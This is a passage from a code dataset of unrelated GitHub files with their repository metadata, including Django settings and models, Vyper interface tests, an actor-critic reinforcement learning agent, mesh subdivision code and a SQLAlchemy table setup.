'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(os.path.dirname(__file__), 'templates'),\n \"/data2/django_templates/djkorra/\",\n \"/data2/django_templates/djcher/\",\n \"/data2/django_templates/\",\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n \"djtools.context_processors.sitevars\",\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.core.context_processors.request',\n 'django.template.context_processors.static',\n 'django.contrib.messages.context_processors.messages',\n ],\n #'loaders': [\n # # insert your TEMPLATE_LOADERS here\n #]\n },\n },\n]\n# caching\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.dummy.DummyCache',\n #'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n #'LOCATION': '127.0.0.1:11211',\n #'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n #'LOCATION': '/var/tmp/django_directory_cache',\n #'TIMEOUT': 60*20,\n #'KEY_PREFIX': \"DIRECTORY_\",\n #'OPTIONS': {\n # 'MAX_ENTRIES': 80000,\n #}\n }\n}\nCACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\n\n# LDAP Constants\nLDAP_SERVER = ''\nLDAP_PORT = '636'\nLDAP_PROTOCOL = \"ldaps\"\nLDAP_BASE = \"\"\nLDAP_USER = \"\"\nLDAP_PASS = \"\"\nLDAP_EMAIL_DOMAIN = \"\"\n# auth backends\nAUTHENTICATION_BACKENDS = (\n 'djauth.ldapBackend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\nLOGIN_URL = '/djskeletor/accounts/login/'\nLOGIN_REDIRECT_URL = '/djskeletor/'\nUSE_X_FORWARDED_HOST = 
True\n#SESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nSESSION_COOKIE_DOMAIN=\".carthage.edu\"\nSESSION_COOKIE_NAME ='django_carthage_cookie'\nSESSION_COOKIE_AGE = 86400\n\n# logging\nLOG_FILEPATH = os.path.join(os.path.dirname(__file__), \"logs/\")\nLOG_FILENAME = LOG_FILEPATH + \"debug.log\"\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'standard': {\n 'format' : \"[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\",\n 'datefmt' : \"%Y/%b/%d %H:%M:%S\"\n },\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',\n 'datefmt' : \"%Y/%b/%d %H:%M:%S\"\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'logfile': {\n 'level':'DEBUG',\n 'class':'logging.handlers.RotatingFileHandler',\n 'filename': LOG_FILENAME,\n 'maxBytes': 50000,\n 'backupCount': 2,\n 'formatter': 'standard',\n },\n 'console':{\n 'level':'INFO',\n 'class':'logging.StreamHandler',\n 'formatter': 'standard'\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'mugshots.upload': {\n 'handlers':['logfile'],\n 'propagate': True,\n 'level':'DEBUG',\n },\n 'core': {\n 'handlers':['logfile'],\n 'propagate': True,\n 'level':'DEBUG',\n },\n 'django': {\n 'handlers':['console'],\n 'propagate': True,\n 'level':'WARN',\n },\n 'django.db.backends': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"carthage-college/django_1.11.x-djparking","sub_path":"djparking/settings_default.py","file_name":"settings_default.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37721363356","text":"import typing\n\nclass DispatchRepr:\n def __repr__(self) -> str:\n _repr = f\"\"\"\n Dispatch(\\n\n vals={self._vals},\n children={self._children}\n )\n \"\"\"\n return _repr\n\nclass a_HrefRepr:\n def __repr__(self) -> str:\n _repr = f\"\"\"\n A_Href(\n href={self.tree.tree_attrs[\"href\"]},\n content={self.struct}\n\n )\n \"\"\"\n return _repr\n\nclass ImgRepr:\n def __repr__(self) -> str:\n _repr = f\"\"\"\n Img(\n src={self.tree.tree_attrs[\"src\"]},\n content={self.struct}\n\n )\n \"\"\"\n return _repr\n\nclass StructuredRecordRepr:\n def __repr__(self) -> str:\n _repr = \"\"\"\n StructuredRecord(\n records = {},\n content = {}\n )\n \"\"\".format(\",\\n\".join(map(repr, self.records)), self.struct)\n return _repr\n\nclass MatchedRunRepr:\n def __repr__(self) -> str:\n _repr = \"\"\"\n MatchedRun(\n runs = {},\n \n )\n \"\"\".format(\",\\n\".join(map(repr, self.run_objs)))\n return _repr\n\nclass PatternMatcherRepr:\n def __repr__(self) -> str:\n _repr = \"\"\"\n PatternMatcher(\n runs = {},\n struct = {}\n )\n \"\"\".format(\",\\n\".join(map(repr, self.runs)), self.struct)\n return _repr\n \n\n","repo_name":"Ajax12345/scrapio","sub_path":"scrapio/parsed_reprs.py","file_name":"parsed_reprs.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"11029728130","text":"from django.db import models\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext as _\nfrom django.contrib.auth.models import User\nfrom model_utils import Choices\n# Create your models here.\n\n\nclass Akcesoria(models.Model):\n\n CO_CHOICES = Choices(\n ('plecki', _('Plecki')),\n ('book', _('Książka')),\n ('szklo', _('Szkło')),\n ('folia', _('Folia')),\n ('inne', _('Inne')),\n )\n\n data = models.DateField(auto_now_add=True)\n kto = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, default=User)\n co = models.CharField(max_length=15, choices=CO_CHOICES, default=CO_CHOICES.plecki)\n kwota = models.DecimalField(max_digits=5, decimal_places=2)\n model = models.CharField(max_length=128, null=True, blank=True)\n\n def __str__(self):\n return self.co\n\n def get_absolute_url(self):\n return reverse(\"dashboard:dashboard-home\")\n","repo_name":"kmoskal/playbb","sub_path":"akcesoria/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35642687440","text":"# Raikage The Third\n\nfrom django.urls import path\n\nfrom .views import *\n\nurlpatterns =[\n path('', homepage, name='home'),\n path('demande-de-devis/', DevisPageView.as_view(), name='devis'),\n path('marketing/', marketing, name='marketing'),\n path('mobile-app/', mobile, name='mobileapp'),\n path('software-development/', softwares, name='softwaredev'),\n path('website-development/', website, name='websitedev'),\n\n]","repo_name":"LeonardoRubuz/startech","sub_path":"visiteurs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"26590732465","text":"#8. Faça um Programa que peça a idade e a altura de 5 pessoas, armazene cada informação no seu respectivo vetor.\n# Imprima a idade e a altura na ordem inversa a ordem lida.\nlistaIdades = []\nlistaAlturas = []\nfor i in range(1,6):\n idade = int(input(f'Informe a idade da pessoa {i}/5: '))\n altura = float(input(f'Informe a altura da pessoa {i}/5: '))\n listaIdades.append(idade)\n listaAlturas.append(altura)\nlistaAlturas.reverse()\nlistaIdades.reverse()\nprint(listaIdades)\nprint(listaAlturas)\n","repo_name":"MdotSouza/WikiPython","sub_path":"04ExerciciosListas/l4ex8.py","file_name":"l4ex8.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27606105307","text":"# coding: utf-8\n\nfrom apis.commons.apis_commons import Apis\n\n\nclass ApisUtils(Apis):\n\n def __init__(self):\n super(ApisUtils, self).__init__()\n\n def get_user_message(self):\n \"\"\"\n 获取用户通知\n \"\"\"\n filter_params = '{\"logic\":\"and\",\"filters\":[{\"field\":\"isDeleted\",\"operator\":\"eq\",\"value\":False},' \\\n '{\"field\":\"userId\",\"operator\":\"eq\",\"value\":\"39fe8e4c-5292-d5da-a219-caa9fafa3913\"}]}'\n\n params = {\n \"skipCount\": 0,\n \"sorting\": \"creationTime desc\",\n \"filter\": filter_params\n }","repo_name":"zj1995-09-09/supercare_api_test","sub_path":"testcase/commons/commons_steps.py","file_name":"commons_steps.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"22557292671","text":"import unittest\n\"\"\"\nTests for stop finder, stop getter, and route selector\n\"\"\"\n\nclass test(unittest.TestCase):\n \n\n def test_model_coverage(self):\n \"\"\"\n Tests that there are models for every stop link\n So we have all of the models\n \"\"\"\n print('testing model coverage')\n \n import os\n import json\n fails=0\n total = 0\n routes = json.loads(open('/home/student/db/resources/trimmed_routes.json','r').read())\n route = routes['15']\n \n \n for route in routes:\n for v_num,v in enumerate(routes[route]):\n failed_on_variation = False\n for i in range(1, len(v) -1 ):\n total += 1\n if not os.path.exists('/data/neural_models3/'+str(v[i])+'_'+str(v[i+1])+'.bin'):\n fails+=1\n failed_on_variation = True\n\n if failed_on_variation:\n print(route,v_num)\n f=open('failed_routes_log.log','a')\n f.write(str(route)+'_'+str(v_num)+'\\n')\n f.close()\n\n print(total,fails)\n input()\n self.assertEqual(fails==0,True) \n\n def test_build_network(self):\n \"\"\"\n Tests that the network object can be built from scratch. Takes forever.\n \"\"\"\n\n from dbanalysis.network import simple_network4\n import pickle\n import time\n t1 = time.time()\n n = simple_network4.simple_network()\n\n n.prepare_dijkstra()\n n.properly_add_foot_links()\n n.generate_time_tables()\n for node in n.nodes:\n\n n.nodes[node].timetable.concat_and_sort()\n with open('/data/done2.bin','wb') as handle:\n pickle.dump(n,handle,protocol=pickle.HIGHEST_PROTOCOL)\n for node in n.nodes:\n print(node)\n self.assertEqual(len(n.nodes[node].timetable.data) > 0, True)\n del(n)\n end_time = time.time() - t1\n import datetime\n dt = datetime.datetime.now()\n f=open('report.txt','a')\n f.write('*******Test report for ' + str(dt) + '*******\\n')\n f.write('Network object constructed and all timetables generated in ' + str(end_time) + 'seconds\\n')\n f.close()\ndef main():\n unittest.main()\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"Manjunathsk92/dbanalysis","sub_path":"dbanalysis/tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"19079867853","text":"import os\n\nimport numpy as np\n\n\ndef triangle_subdivision(n_div):\n faces = []\n for i in range(1, n_div + 1)[::-1]:\n for j in range(n_div + 1 - i):\n k = n_div - i - j\n f = [(i, j, k), (i - 1, j + 1, k), (i - 1, j, k + 1)]\n faces.append(f)\n for i in range(1, n_div + 1)[::-1]:\n for j in range(1, n_div + 1 - i):\n k = n_div - i - j\n f = [(i, j, k), (i - 1, j, k + 1), (i, j - 1, k + 1)]\n faces.append(f)\n return faces\n\n\ndef subdivide_edges(coords, faces, n_div):\n n_edges = faces.shape[0] * 3 // 2\n nv_new = n_edges * (n_div - 1)\n new_coords = np.zeros((nv_new, 3), dtype=coords.dtype)\n\n nv = coords.shape[0]\n count = 0\n edges = set()\n e_mapping = {}\n for f in faces:\n for a, b in [[f[0], f[1]], [f[0], f[2]], [f[1], f[2]]]:\n e = (a, b) if a < b else (b, a)\n if e in edges:\n continue\n edges.add(e)\n for i in range(1, n_div):\n c = (coords[a] * i + coords[b] * (n_div - i)) / n_div\n # c /= np.linalg.norm(c)\n # new_coords.append(c)\n new_coords[count] = c\n e_mapping[(e[0], e[1], i)] = count + nv\n count += 1\n\n return new_coords, e_mapping\n\n\ndef subdivide_inside(coords, faces, e_mapping, n_div, count_base):\n # new_coords, new_faces = [], []\n nv_new = (n_div - 1) * (n_div - 2) // 2 * len(faces)\n new_coords = np.zeros((nv_new, 3), dtype=coords.dtype)\n count = 0\n new_faces = []\n nf_base = triangle_subdivision(n_div)\n\n for f in faces:\n mapping = {\n (n_div, 0, 0): f[0],\n (0, n_div, 0): f[1],\n (0, 0, n_div): f[2],\n }\n\n for ii, jj in [[0, 1], [0, 2], [1, 2]]:\n a, b = f[[ii, jj]]\n aa, bb = (a, b) if a < b else (b, a)\n for step in range(1, n_div):\n val = e_mapping[aa, bb, step]\n key = [0, 0, 0]\n key[ii] = step\n key[jj] = n_div - step\n mapping[tuple(key)] = val\n\n for i in range(n_div)[::-1]:\n for j in range(n_div + 1 - i):\n k = n_div - i - j\n if (i, j, k) not in mapping:\n mapping[(i, j, k)] = count + count_base\n c = np.sum(\n coords[f] * (np.array([i, j, k])[:, np.newaxis] / n_div), axis=0\n )\n # c /= np.linalg.norm(c)\n # new_coords.append(c)\n new_coords[count] = c\n count += 1\n\n nf = [[mapping[v] for v in f] for f in nf_base]\n new_faces += nf\n\n # new_coords = np.array(new_coords)\n new_faces = np.array(new_faces)\n return new_coords, new_faces\n\n\ndef surface_subdivision(coords, faces, n_div):\n edge_coords, e_mapping = subdivide_edges(coords, faces, n_div)\n count = coords.shape[0] + edge_coords.shape[0]\n inside_coords, new_faces = subdivide_inside(coords, faces, e_mapping, n_div, count)\n print(coords.shape, edge_coords.shape, inside_coords.shape)\n new_coords = np.concatenate([coords, edge_coords, inside_coords], axis=0)\n return new_coords, new_faces\n\n\n# new_coords, new_faces = [], []\n\n# # count = coords.shape[0]\n\n# new_coords_edges, e_mapping = subdivide_edges(coords, faces, n_div)\n\n\n# new_coords = np.array(new_coords)\n# new_faces = np.array(new_faces)\n# coords = np.concatenate([coords, new_coords], axis=0)\n\n# return coords, new_faces\n","repo_name":"neuroboros/neuroboros","sub_path":"src/neuroboros/surface/subdivision.py","file_name":"subdivision.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"24763824353","text":"from vyper.compiler import (\n compile_code,\n compile_codes,\n)\nfrom vyper.exceptions import (\n StructureException,\n)\nfrom vyper.interfaces import (\n ERC20,\n ERC721,\n)\nfrom vyper.signatures.interface import (\n extract_file_interface_imports,\n extract_sigs,\n)\n\n\ndef test_basic_extract_interface():\n code = \"\"\"\n# Events\n\nTransfer: event({_from: address, _to: address, _value: uint256})\n\n# Functions\n\n@constant\n@public\ndef allowance(_owner: address, _spender: address) -> (uint256, uint256):\n return 1, 2\n \"\"\"\n\n out = compile_code(code, ['interface'])\n out = out['interface']\n code_pass = '\\n'.join(code.split('\\n')[:-2] + [' pass']) # replace with a pass statement.\n\n assert code_pass.strip() == out.strip()\n\n\ndef test_basic_extract_external_interface():\n code = \"\"\"\n@constant\n@public\ndef allowance(_owner: address, _spender: address) -> (uint256, uint256):\n return 1, 2\n\n@public\ndef test(_owner: address):\n pass\n\n@constant\n@private\ndef _prive(_owner: address, _spender: address) -> (uint256, uint256):\n return 1, 2\n \"\"\"\n\n interface = \"\"\"\n# External Contracts\ncontract One:\n def allowance(_owner: address, _spender: address) -> (uint256, uint256): constant\n def test(_owner: address): modifying\n \"\"\"\n\n out = compile_codes({'one.vy': code}, ['external_interface'])[0]\n out = out['external_interface']\n\n assert interface.strip() == out.strip()\n\n\ndef test_basic_interface_implements(assert_compile_failed):\n code = \"\"\"\nfrom vyper.interfaces import ERC20\n\nimplements: ERC20\n\n\n@public\ndef test() -> bool:\n return True\n \"\"\"\n\n assert_compile_failed(\n lambda: compile_codes({'one.vy': code}),\n StructureException\n )\n\n\ndef test_builtin_interfaces_parse():\n assert len(extract_sigs({'type': 'vyper', 'code': ERC20.interface_code})) == 8\n assert len(extract_sigs({'type': 'vyper', 'code': ERC721.interface_code})) == 13\n\n\ndef test_external_interface_parsing(assert_compile_failed):\n interface_code = \"\"\"\n@public\ndef foo() -> uint256:\n pass\n\n@public\ndef bar() -> uint256:\n pass\n \"\"\"\n\n interface_codes = {\n 'FooBarInterface': {\n 'type': 'vyper',\n 'code': interface_code\n }\n }\n\n code = \"\"\"\nimport a as FooBarInterface\n\nimplements: FooBarInterface\n\n@public\ndef foo() -> uint256:\n return 1\n\n@public\ndef bar() -> uint256:\n return 2\n \"\"\"\n\n assert compile_codes({'one.vy': code}, interface_codes=interface_codes)[0]\n\n not_implemented_code = \"\"\"\nimport a as FooBarInterface\n\nimplements: FooBarInterface\n\n@public\ndef foo() -> uint256:\n return 1\n\n \"\"\"\n\n assert_compile_failed(\n lambda: compile_codes({'one.vy': not_implemented_code}, interface_codes=interface_codes)[0],\n StructureException\n )\n\n\ndef test_extract_file_interface_imports(assert_compile_failed):\n code = \"\"\"\nimport a as FooBarInterface\n \"\"\"\n\n assert extract_file_interface_imports(code) == {'FooBarInterface': 'a'}\n\n invalid_no_alias_code = \"\"\"\nimport a\n \"\"\"\n assert_compile_failed(\n lambda: extract_file_interface_imports(invalid_no_alias_code), StructureException\n )\n\n invalid_interfac_already_exists_code = \"\"\"\nimport a as A\nimport a as A\n \"\"\"\n assert_compile_failed(lambda: extract_file_interface_imports(invalid_interfac_already_exists_code), StructureException) # noqa: E501\n\n\ndef test_external_call_to_interface(w3, get_contract):\n token_code = \"\"\"\nbalanceOf: public(map(address, uint256))\n\n@public\ndef transfer(to: address, value: uint256):\n 
self.balanceOf[to] += value\n \"\"\"\n\n code = \"\"\"\nimport one as TokenCode\n\ncontract EPI:\n def test() -> uint256: constant\n\n\ntoken_address: TokenCode\n\n\n@public\ndef __init__(_token_address: address):\n self.token_address = TokenCode(_token_address)\n\n\n@public\ndef test():\n self.token_address.transfer(msg.sender, 1000)\n \"\"\"\n\n erc20 = get_contract(token_code)\n test_c = get_contract(code, *[erc20.address], interface_codes={\n 'TokenCode': {'type': 'vyper', 'code': token_code}\n })\n\n sender = w3.eth.accounts[0]\n assert erc20.balanceOf(sender) == 0\n\n test_c.test(transact={})\n assert erc20.balanceOf(sender) == 1000\n\n\ndef test_external_call_to_builtin_interface(w3, get_contract):\n token_code = \"\"\"\nbalanceOf: public(map(address, uint256))\n\n@public\ndef transfer(to: address, value: uint256):\n self.balanceOf[to] += value\n \"\"\"\n\n code = \"\"\"\nfrom vyper.interfaces import ERC20\n\n\ntoken_address: ERC20\n\n\n@public\ndef __init__(_token_address: address):\n self.token_address = ERC20(_token_address)\n\n\n@public\ndef test():\n self.token_address.transfer(msg.sender, 1000)\n \"\"\"\n\n erc20 = get_contract(token_code)\n test_c = get_contract(code, *[erc20.address], interface_codes={\n 'TokenCode': {\n 'type': 'vyper',\n 'code': token_code\n }\n })\n\n sender = w3.eth.accounts[0]\n assert erc20.balanceOf(sender) == 0\n\n test_c.test(transact={})\n assert erc20.balanceOf(sender) == 1000\n\n\ndef test_json_interface(get_contract):\n code = \"\"\"\nimport folding as Folding\n\nimplements: Folding\n\n@public\ndef test(a: uint256) -> uint256:\n return 1 + a\n\n\n@public\ndef test2(a: uint256):\n pass\n \"\"\"\n\n interface_codes = {\n 'Folding': {\n 'type': 'json',\n 'code': [\n {\n \"name\": \"test\",\n \"outputs\": [{\n \"type\": \"uint256\",\n \"name\": \"out\"\n }],\n \"inputs\": [{\n \"type\": \"uint256\",\n \"name\": \"s\"\n }],\n \"constant\": False,\n \"payable\": False,\n \"type\": \"function\",\n },\n {\n \"name\": \"test2\",\n \"outputs\": [],\n \"inputs\": [{\n \"type\": \"uint256\",\n \"name\": \"s\"\n }],\n \"constant\": False,\n \"payable\": False,\n \"type\": \"function\",\n }\n ]\n }\n }\n\n c = get_contract(code, interface_codes=interface_codes)\n\n assert c.test(2) == 3\n\n\ndef test_units_interface(w3, get_contract):\n code = \"\"\"\nimport balanceof as BalanceOf\n\nimplements: BalanceOf\n\n@public\n@constant\ndef balanceOf(owner: address) -> wei_value:\n return as_wei_value(1, \"ether\")\n \"\"\"\n interface_code = \"\"\"\n@public\n@constant\ndef balanceOf(owner: address) -> uint256:\n pass\n \"\"\"\n interface_codes = {\n \"BalanceOf\": {\n 'type': 'vyper',\n 'code': interface_code\n }\n }\n c = get_contract(code, interface_codes=interface_codes)\n\n assert c.balanceOf(w3.eth.accounts[0]) == w3.toWei(1, \"ether\")\n","repo_name":"ssteiger/Vyper-Contract-GUI-Depreciated","sub_path":"vyper/tests/parser/functions/test_interfaces.py","file_name":"test_interfaces.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"21663292742","text":"# -*- coding: utf-8 -*-\n\nclass Wrapper:\n def __init__(self):\n self.data = [\n {'city': 'Marseilles'},\n {'city': 'Paris'}, \n {'city': 'Lyon'}, \n ]\n self.website = 'https://www.mazda.fr/forms-v2/dealer-locatorfrance/'\n self.category = 'car dealer'\n self.http_method = 'POST'\n self.response_format = 'JSON'\n self.notes = 'Uses JSON for payload'\n\n def run(self, browser, inputs):\n browser.get(self.website)\n browser.wait_load('input[name=\"bylocation\"]')#div.main-search')\n browser.keys('input[name=\"bylocation\"]', inputs['city'] + '', False)#True)\n browser.click('div.main-search > button', True)\n browser.wait_load('div.dealer-name a')\n return {\n 'name': [e.partition('. ')[-1] for e in browser.text('div.dealer-name a')],\n 'address': browser.text('li[ng-if=\"address.FirstLine\"]'),\n 'city': browser.text('li[ng-if=\"address.TownCity\"]'),\n 'postcode': browser.text('li[ng-if=\"address.PostCode\"]'),\n }\n","repo_name":"richardpenman/minwrap","sub_path":"wrappers/mazda.py","file_name":"mazda.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20672358613","text":"from sqlalchemy import create_engine, MetaData, Table, Integer, Column, JSON, Text, DateTime\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, Session\n\nBase = declarative_base()\n\n\ndef connect(db_URI: str) -> Session:\n database_URI = db_URI\n created_engine = create_engine(database_URI, echo=True)\n session = sessionmaker(bind=created_engine, )\n session = session()\n _create_table_if_needed('news_article', created_engine)\n return session\n\n\ndef _create_table_if_needed(table_name: str, created_engine: Engine) -> None:\n metadata = MetaData()\n new_table = Table(table_name, metadata,\n Column('id', Integer, primary_key=True),\n Column('author', JSON),\n Column('body', Text),\n Column('categories', JSON),\n Column('characters_count', Integer),\n Column('entities', JSON),\n Column('hashtags', Text),\n Column('keywords', Text),\n Column('language', Text),\n Column('links', JSON),\n Column('media', JSON),\n Column('paragraphs_count', Integer),\n Column('published_at', DateTime),\n Column('sentences_count', Integer),\n Column('sentiment', JSON),\n Column('social_shares_count', JSON),\n Column('source', JSON),\n Column('summary', JSON),\n Column('title', Text),\n Column('words_count', Integer),\n mysql_charset='latin1')\n metadata.create_all(created_engine, tables=[new_table], checkfirst=True)\n","repo_name":"venomouscyanide/SQL-Alchemy-JSON-Import","sub_path":"connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13495422478","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Categorical\n\nfrom common import obesrvation_shape, device, Agent\nfrom utils import get_cumulative_rewards, generate_session, generate_session_batch, get_total_rewards\n\n\ndef reinforce_loss(logprobas, actions, rewards):\n # select log-probabilities for chosen actions, log pi(a_i|s_i)\n logprobas_for_actions = torch.sum(logprobas * to_one_hot(actions).to(torch.float), dim=1)\n return torch.mean(-logprobas_for_actions * rewards)\n\n\nclass ActorCritic(Agent):\n def __init__(self, observation_space, action_space, args):\n self.model = MLPPolicy(observation_space, action_space).to(device)\n self.optimizer = torch.optim.Adam(self.model.parameters(), args.lr)\n self.gamma = args.gamma\n self.value_loss_coef = args.value_loss_coef\n self.entropy_coef = args.entropy_coef\n\n def save(self, path):\n torch.save({\n 'state_dict': self.model.state_dict()\n }, path)\n\n def load(self, path):\n checkpoint = torch.load(path)\n state_dict = checkpoint.get('state_dict', checkpoint)\n self.model.load_state_dict(state_dict)\n\n def update(self, states, actions, cumulative_rewards, dones=None):\n states = torch.tensor(states).to(device, torch.float)\n actions = torch.tensor(actions).to(device, torch.float)\n cumulative_returns = torch.tensor(cumulative_rewards).to(device, torch.float)\n\n # predict logits, probas and log-probas using an agent.\n logits, values = self.model(states)\n probas = F.softmax(logits, dim=1)\n logprobas = F.log_softmax(logits, dim=1)\n\n # REINFORCE objective function\n self.optimizer.zero_grad()\n rewards_with_baseline = cumulative_returns - values.squeeze(1)\n policy_loss = reinforce_loss(logprobas, actions, rewards_with_baseline)\n value_loss = F.smooth_l1_loss(values, cumulative_returns.unsqueeze(1))\n entropy = torch.mean(-torch.sum(logprobas * probas, dim=1))\n loss = policy_loss + self.value_loss_coef * value_loss + self.entropy_coef * entropy\n loss.backward()\n self.optimizer.step()\n\n return loss, policy_loss, value_loss, entropy\n\n def get_action(self, state):\n with torch.no_grad():\n logits, _ = self.model(torch.tensor(state).to(device, torch.float))\n dist = Categorical(F.softmax(logits, dim=1))\n sample = dist.sample()\n return sample.detach().cpu().numpy()\n\n def get_value(self, state):\n with torch.no_grad():\n _, values = self.model(torch.tensor(state).to(device, torch.float))\n return values.detach().cpu().numpy()\n\n\nclass MLPPolicy(nn.Module):\n def __init__(self, observation_space, action_space):\n super(MLPPolicy, self).__init__()\n\n self.logits = nn.Sequential(\n nn.Linear(*obesrvation_shape(observation_space), 64),\n nn.ReLU(),\n nn.Linear(64, 64),\n nn.ReLU(),\n nn.Linear(64, action_space.n)\n )\n\n self.state_values = nn.Sequential(\n nn.Linear(*obesrvation_shape(observation_space), 64),\n nn.ReLU(),\n nn.Linear(64, 64),\n nn.ReLU(),\n nn.Linear(64, 1)\n )\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n return self.logits(x), self.state_values(x)\n\n\ndef to_one_hot(y, n_dims=None):\n \"\"\" Take an integer vector (tensor of variable) and convert it to 1-hot matrix. 
\"\"\"\n y_tensor = y.to(torch.long).view(-1, 1)\n n_dims = n_dims if n_dims is not None else int(torch.max(y_tensor)) + 1\n y_one_hot = y_tensor.new_zeros(y_tensor.size(0), n_dims).scatter_(1, y_tensor, 1)\n return y_one_hot\n\n\ndef train(agent, env, args, max_reward=200):\n total_rewars = []\n for i in range(1, args.num_steps + 1):\n states, actions, rewards, dones, lastvalues = generate_session_batch(agent, env, args.episode_length)\n\n # get cumulative rewards\n # use fictive reward for handling unfinished sessions\n rewards_ = np.c_[rewards, lastvalues]\n dones_ = np.c_[dones, np.zeros(dones.shape[0])]\n cumulative_rewards = get_cumulative_rewards(rewards_, agent.gamma, dones=dones_)[:, :-1]\n\n # reshape sessions to form a batch\n batch_size = env.num_envs * args.episode_length\n states = states.reshape((batch_size,) + env.observation_space.shape)\n actions = actions.reshape((batch_size,))\n cumulative_rewards = cumulative_rewards.reshape((batch_size,))\n dones = dones.reshape((batch_size,))\n\n # update policy on a batch\n losses = agent.update(states, actions, cumulative_rewards, dones)\n # note that last session reward is truncated\n total_rewars.extend(get_total_rewards(rewards, dones))\n\n current_mean_reward = np.mean(total_rewars[-100:])\n if i % 100 == 0:\n print(\"Iteration: %i, Mean reward:%.3f\" % (i, current_mean_reward))\n if current_mean_reward > max_reward:\n return\n","repo_name":"vadimadr/reinforcement_learning","sub_path":"a2c/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39952013727","text":"from textwrap import dedent\n\nfrom weaveio.data import Data\nfrom weaveio.hierarchy import Hierarchy, Multiple\n\n\nclass CASU(Hierarchy):\n idname = 'id'\n\nclass Run(Hierarchy):\n idname = 'id'\n\nclass RawSpectrum(Hierarchy):\n parents = [CASU, Run]\n identifier_builder = ['casu', 'run']\n\n\n\ndata = Data(dbname='lowleveltest')\ndata.hierarchies = {CASU, Run, RawSpectrum}\nwith data.write:\n # data.drop_all_constraints(indexes=True)\n # data.apply_constraints() # needed here because we're doing it ourselves\n with data.write_cypher('ignore') as query:\n casu = CASU(id=1)\n run = Run(id=1)\n raw = RawSpectrum(casu=casu, run=run)\n\n cypher, params = query.render_query()\n print(dedent(cypher))\n # results = data.graph.execute(cypher, **params)","repo_name":"philastrophist/weave-io","sub_path":"merge_test.py","file_name":"merge_test.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21221710357","text":"# coding: utf-8\n\nimport os\nimport codecs\n\n\ndef load_csv(file_path):\n _csv_list = []\n _file = codecs.open(file_path)\n\n try:\n _data = _file.read()\n if _data[:3] == codecs.BOM_UTF8:\n _data = _data[3:]\n _lines = _data.splitlines()\n _merge_line = \"\"\n _line_index = 0\n for i in range(len(_lines)):\n _merge_line += _lines[i] + \"\\n\"\n if _merge_line.count('\"') % 2 == 0:\n _column_list = []\n _columns = _merge_line.strip(\"\\n\").split(\",\")\n _merge_column = \"\"\n for _col in _columns:\n _merge_column += _col + \",\"\n if _merge_column.count('\"') % 2 == 0:\n _column_list.append(_merge_column.strip(\",\").strip('\"'))\n _merge_column = \"\"\n _csv_list.append(_column_list)\n # _csv_list[_line_index].append()\n _merge_line = \"\"\n _line_index += 1\n return _csv_list\n\n finally:\n if _file is not None:\n _file.close()\n\n\ndef get_files(directory, extension=\".json\"):\n \"\"\"\n Get files from the directory\n :param directory: the directory\n :param 